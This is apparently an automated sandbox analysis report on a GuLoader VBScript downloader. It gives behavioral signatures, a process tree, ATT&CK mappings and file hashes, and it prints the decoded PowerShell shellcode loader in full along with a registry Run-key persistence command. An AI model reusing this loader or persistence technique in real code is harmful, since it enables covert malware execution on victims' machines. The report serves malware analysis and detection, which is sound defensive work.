Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25/12/2024, 03:35
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs
-
Size
727KB
-
MD5
99a444a2e45d6007e37fb0c2c25e49c4
-
SHA1
7ab6b11b684243ae587b6eb037cabe98984792ff
-
SHA256
724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3
-
SHA512
7398994f927e22cd1bf868436c4645f368cf3439fe00dd836c10d8860ae22c73aa16f4ddd9c6f37053c326d65734d9e6ad1afe73955cc727c7c982b31f6ae69e
-
SSDEEP
6144:7umfsxtdM+jbYG0XxnHVMYhRANfAD58OAFZ3/g5VCyh9IiwEw6IAl:uoQYhiNft+wErIe
Malware Config
Signatures
-
Guloader family
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bulningssaarer = "%Mija% -w 1 $Kvstendediplom=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Medsammensvornest;%Mija% -encodedcommand($Kvstendediplom)" ieinstal.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 20 drive.google.com 21 drive.google.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 1140 ieinstal.exe 1140 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1800 powershell.exe 1140 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1800 set thread context of 1140 1800 powershell.exe 97 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ieinstal.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1800 powershell.exe 1800 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1800 powershell.exe 1800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1800 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1140 ieinstal.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 3656 wrote to memory of 1800 3656 WScript.exe 85 PID 3656 wrote to memory of 1800 3656 WScript.exe 85 PID 3656 wrote to memory of 1800 3656 WScript.exe 85 PID 1800 wrote to memory of 3184 1800 powershell.exe 87 PID 1800 wrote to memory of 3184 1800 powershell.exe 87 PID 1800 wrote to memory of 3184 1800 powershell.exe 87 PID 3184 wrote to memory of 4520 3184 csc.exe 88 PID 3184 wrote to memory of 4520 3184 csc.exe 88 PID 3184 wrote to memory of 4520 3184 csc.exe 88 PID 1800 wrote to memory of 4888 1800 powershell.exe 96 PID 1800 wrote to memory of 4888 1800 powershell.exe 96 PID 1800 wrote to memory of 4888 1800 powershell.exe 96 PID 1800 wrote to memory of 1140 1800 powershell.exe 97 PID 1800 wrote to memory of 1140 1800 powershell.exe 97 PID 1800 wrote to memory of 1140 1800 powershell.exe 97 PID 1800 wrote to memory of 1140 1800 powershell.exe 97
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# H y a e n o d o n t d e p u t e r e t h a m p e f r s   S u b s t i t u r m i s g r a d e   T m m e r f l a a d e r s s p a t t i n g u d s   A r i l e d l a d i f i e d t i l g a n g   G r u n d t o n e s m i t s u m a t a p r e c e n   o r g a n i s a t i o n e r n e s s   M e t h o l j u d e a n i n d o r d n i n g m o n o t y p   B e f o l k n i n g s s u n d h e d e n f o r u d b e   C a r a m e l i n p u t t o o m o n o p l o i   D r n i n g e r s a p s i d a l l   T a m p o n a d e n s t r i b   S o k k e f d d e r s u l a s t e l i g h e d s o v e r h o   B a r n a g t i g h e d e r n e c a g i e   L a n d s f o r e n i n g s n o    
 $ R u m f a r t s c e n t r e s v i r k 0   =   " N " + " t " + " A l l " + " o c a t e " + " V i r t " + " u a l " + " M e m " + " o r y "  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1  
 {  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t K e y b o a r d S t a t e ( i n t   v a r 1 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   R t l M o v e M e m o r y ( I n t P t r   S a m l e v e r s k e n s k r 1 , r e f   I n t 3 2   S a m l e v e r s k e n s k r 2 , i n t   S a m l e v e r s k e n s k r 3 ) ;  
  
 [ D l l I m p o r t ( " w i n m m . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   t i m e B e g i n P e r i o d ( i n t   v a r 1 ) ;  
 [ D l l I m p o r t ( " n t d l l . d l l " ,   E n t r y P o i n t = " $ R u m f a r t s c e n t r e s v i r k 0 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C o r e 1 ( i n t   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 6 , r e f   I n t 3 2   F o r f i l m e n e s r e k n o c k r e p r o d u c , i n t   S a m l e v e r s k e n s k r , r e f   I n t 3 2   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m , i n t   R u m f a r t s c e n t r e s v i r k , i n t   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 7 ) ;  
  
 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t I C M P r o f i l e ( i n t   v a r 1 , i n t   v a r 2 , i n t   v a r 3 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t S t r i n g T y p e E x ( i n t   v a r 1 , i n t   v a r 2 , i n t   v a r 3 , i n t   v a r 4 , i n t   v a r 5 ) ;  
  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   I s R e c t E m p t y ( i n t   v a r 1 ) ;  
  
  
  
 [ D l l I m p o r t ( " u s e r 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( u i n t   S a m l e v e r s k e n s k r 5 , i n t   S a m l e v e r s k e n s k r 6 ) ;  
  
  
 }  
 " @  
 # D e m u r s t e k n o l o g i s k e s n d e   M o t h e r l e s s h o t e l v r e l s e   Y a l l a e r u d e l e l i g t a   K v a r t e r r a p p o r t e r s s v e l n i n g   F i b e r g l a s s e t s f r i s k e r   T r s n i t s u n a s s o c i a t i v e c h o   P o s t p a t e l l a r t e   R a g t o p s k r m h a a n d t e r i n g e r n e t r l   S e m i p r o g r e s s i v e l y u   m a n d e t i m e r n e s l e z g y p s u   U n d e r m e n n e s k e b r a c t l e t t a p s t e r l y   C h a u c h a t r e v e r e n   L s e h a s t i g h e d e n s d v r g b i r k e s a b a n   S t e n r k e n e n a c c e s s i o n s e j a k u l a t i o   M i n n e s o t a b a s i l i   H u d f l e t n i n g e r n e s l i g h t n i n g p   N a t a l i t y r a t i o n a l i   B j r n e l a b m a s c u l i n e s n o   A f v i s e r n e s u n i n t r o d u c t o r y f o r   A r i a d n e t r a a d e s b l a n c h e r i n g e n   B r i b e r s t a n d a r d i s e   P r o p i t i o u s l y i n e x p r e s s c e n t   P o l l i n i f e r o u s t o   K a p e l p o s t s c u t e l l a i r r e s p o n s i b l e   S u p e r u r g e n t l y r e s u n d f e r i e g o   H e n n i n g s b e g l o b   T a r r e r a n g r e b s p u n k t s e k s   B u c h i t e p i l e r g r u t c h p l u m c o t s p y   q u a s s e x t r a t e l l u r i a n e l e c t r o d i a l   S m u g l e r e n s m a t r i p o t   u n s a w n p i e t e r s a n g i r i n h a b i t a t i o n   R i d s e n e h u n d e s v   S t r a f a f s o n e r s u i g e n n e m s k u e l i g      
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 = 0 ;  
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 9 = 1 0 4 8 5 7 6 ;  
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 8 = [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : C o r e 1 ( - 1 , [ r e f ] $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 , 0 , [ r e f ] $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 9 , 1 2 2 8 8 , 6 4 )  
 $ b r k d e l e n e s e f t e r g i v e t n = ( G e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ T a l t e s a f t e n b n n e n s p r m i e l a a n s c u " ) . U n s a l l y i n g r e b e l l i o n n o n e  
  
 $ U d t y d e t r o t h k o m e l o d   =   [ S y s t e m . B y t e [ ] ] : : C r e a t e I n s t a n c e ( [ S y s t e m . B y t e ] , $ b r k d e l e n e s e f t e r g i v e t n . L e n g t h   /   2 )  
  
  
  
 F o r ( $ i = 0 ;   $ i   - l t   $ b r k d e l e n e s e f t e r g i v e t n . L e n g t h ;   $ i + = 2 )  
 	 {  
                 $ U d t y d e t r o t h k o m e l o d [ $ i / 2 ]   =   [ c o n v e r t ] : : T o B y t e ( $ b r k d e l e n e s e f t e r g i v e t n . S u b s t r i n g ( $ i ,   2 ) ,   1 6 )  
         }  
  
  
 f o r ( $ K e g l e f l a d e r n e e t h n o g r a p h = 0 ;   $ K e g l e f l a d e r n e e t h n o g r a p h   - l t   $ U d t y d e t r o t h k o m e l o d . c o u n t   ;   $ K e g l e f l a d e r n e e t h n o g r a p h + + )  
 {  
 	  
 [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : R t l M o v e M e m o r y ( $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 + $ K e g l e f l a d e r n e e t h n o g r a p h , [ r e f ] $ U d t y d e t r o t h k o m e l o d [ $ K e g l e f l a d e r n e e t h n o g r a p h ] , 1 )  
  
 }  
 [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : E n u m W i n d o w s ( $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 ,   0 )  
  
 "2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u4fjzatq\u4fjzatq.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD9F5.tmp" "c:\Users\Admin\AppData\Local\Temp\u4fjzatq\CSC909CC0D8DC84E58B0BDAC9CE5DFC42.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:4520
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵PID:4888
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1140
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5deae102fc8e6aeb3ca57329bb7776828
SHA1d2694443615caa067a6c4d4cdc0ff17922700740
SHA25632f09639dcb582c287af0f1bfd6df0534961263a7a244ed525db7b82aa7546b1
SHA51216231d53c7d5e642d513b4a2c715af2a141ef9fe7e7a070b69033fe4ec9fd57fc677a10ac21c995c4639f58775e488c4736c2b65c4106f035a42302a60871786
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD54171f500478b469c653103cad022c6d3
SHA1909ef5b4d87a085674c511aff2ab91ceba04ec10
SHA25654bf7ae875df2827f4ffa42fc21c14c422d7e6dc21d580ebb1db24b134d2fced
SHA512c5f17d8800bc3f80bcf4129e411785a43767124d653380bead626cd39ea0cd59cea332a3b3e1bdfcd5e4c527768deb59a57c300f19497e54f64f637757aedc84
-
Filesize
652B
MD55a1767ca634c1e3777cd9c8485ee989e
SHA17408056320b2c455fbb954f6b7c98d2f347ee850
SHA2568a063312bee6cc9bf136048b0edc9784a1f24de6faf68246cd96141843b61c5b
SHA51298d01a2fecbf6af9a4f94c669659953e831a9fb52b9ad7dfee4d27bb803e068ea1ef72e3735256bea07d08a14d5a3b00df8f2424668b1e56c7d75df0f3b2ce44
-
Filesize
1KB
MD5fd01bdbcce0a28e44e23fd48d27fecb3
SHA1e601c783d5852bec3efdb1c2bac13b5e0c65f2a2
SHA256c0fef30f1c5beaa723a8f20f8f728ae7f5241cffed7ba54e792b32500ae7d20d
SHA5120a2978a4a22b75f871b70f7e86cfc8d92b9b314f86396ceb995f254d16ad85303fa0a6236a2e2308b23fbe16edbfbe8c9ac5b63d2daeb171d1126e97a6b21a69
-
Filesize
369B
MD52e11df4149ad619c6045e6c0c5901e07
SHA14f590a89dc3bcbbe58fd509d1eec5378b77bbcf6
SHA256fbdfafc7eeabd93198e68c5e7a465ec2a542e8946731717155b5db0fd820aaf6
SHA51204e53c6580ddd0535a64d6f4dae66b6998855591fa72098e1fe5f0d4cd74a7514e3793529b99c6935f232b9f3eaffad65c2548bb2c769a28151e254618434785